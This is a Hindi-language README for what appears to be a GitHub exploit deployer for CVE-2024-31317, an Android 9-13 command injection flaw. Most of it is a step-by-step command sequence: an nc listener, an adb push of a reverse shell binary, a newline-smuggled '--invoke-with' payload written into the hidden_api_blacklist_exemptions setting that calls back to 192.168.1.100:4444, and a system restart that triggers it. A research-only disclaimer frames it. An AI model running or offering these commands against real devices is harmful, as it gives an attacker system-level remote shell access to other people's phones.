
CVE-2024-31317 के लिए स्वचालित तैनाती उपकरण, जो Android 9-13 में एक कमांड इंजेक्शन भेद्यता है। इसमें रिवर्स शेल पेलोड, कंपाइल स्क्रिप्ट, और सुरक्षा अनुसंधान और शिक्षा के लिए तकनीकी विश्लेषण शामिल है।
यह परियोजना केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उपयोग करके अनधिकृत परीक्षण करना अवैध है। लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
CVE-2024-31317 एक गंभीर सुरक्षा कमजोरी है जो Android 9 से Android 13 तक के उपकरणों को प्रभावित करती है, जो WRITE_SECURE_SETTINGS अनुमति वाले अनुप्रयोगों को कमांड इंजेक्शन के माध्यम से सिस्टम-स्तरीय अनुमति निष्पादन प्राप्त करने की अनुमति देती है।
यह परियोजना इस कमजोरी का विस्तृत तकनीकी विश्लेषण, प्रूफ-ऑफ-कॉन्सेप्ट कोड, और स्वचालित तैनाती उपकरण प्रदान करती है।
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# लिसनर प्रारंभ करें
nc -lvnp 4444
# पुश करें और निष्पादित करें
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# पेलोड इंजेक्ट करें
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# कमजोरी ट्रिगर करें
adb shell stop && adb shell start
यह परियोजना केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उपयोग करने का अर्थ है कि आप सहमत हैं:
यह परियोजना MIT लाइसेंस के तहत है - विस्तृत जानकारी के लिए LICENSE फ़ाइल देखें
fcy10012 - GitHub
संदर्भ परियोजना: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ यदि यह परियोजना आपके लिए उपयोगी है, तो कृपया इसे एक स्टार दें!